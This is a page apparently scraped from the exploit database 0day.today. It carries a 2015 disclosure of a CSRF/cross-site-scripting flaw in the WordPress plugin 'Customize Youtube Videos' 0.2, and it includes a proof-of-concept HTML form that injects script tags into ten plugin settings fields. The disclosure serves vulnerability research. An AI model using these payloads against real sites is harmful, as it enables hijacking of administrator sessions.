0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Customize Youtube Videos 0.2 Cross Site Scripting Vulnerability
Title: WordPress 'Customize Youtube Videos' Plugin Version: 0.2 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-16 Download: - https://wordpress.org/plugins/customize-youtube-videos/ - https://plugins.svn.wordpress.org/customize-youtube-videos/ Notified Vendor/WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== This plugin lets you customize the Youtube videos you are going to embed in your posts and pages ## CSRF/XSS vulnerabilities ========================================================== Customized video settings are displayed unsanitized when pressing "Get the new embed code for your customized Youtube video". PoC: Log in as admin and submit the following form <form method="POST" action="[URL]/wp-admin/admin.php?page=customize-youtube-videos"> <input type="text" name="code" value="'></iframe></textarea><script>alert(1)</script>"><br /> <input type="text" name="start" value="'></iframe></textarea><script>alert(2)</script>"><br /> <input type="text" name="end" value="'></iframe></textarea><script>alert(3)</script>"><br /> <input type="text" name="autohide" value="'></iframe></textarea><script>alert(4)</script>"><br /> <input type="text" name="autoplay" value="'></iframe></textarea><script>alert(5)</script>"><br /> <input type="text" name="cc_load_policy" value="'></iframe></textarea><script>alert(6)</script>"><br /> <input type="text" name="controls" value="'></iframe></textarea><script>alert(7)</script>"><br /> <input type="text" name="loop" value="'></iframe></textarea><script>alert(8)</script>"><br /> <input type="text" name="rel" value="'></iframe></textarea><script>alert(9)</script>"><br /> <input type="text" name="showinfo" value="'></iframe></textarea><script>alert(10)</script>"><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available ========================================================== XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications. # 0day.today [2024-11-15] #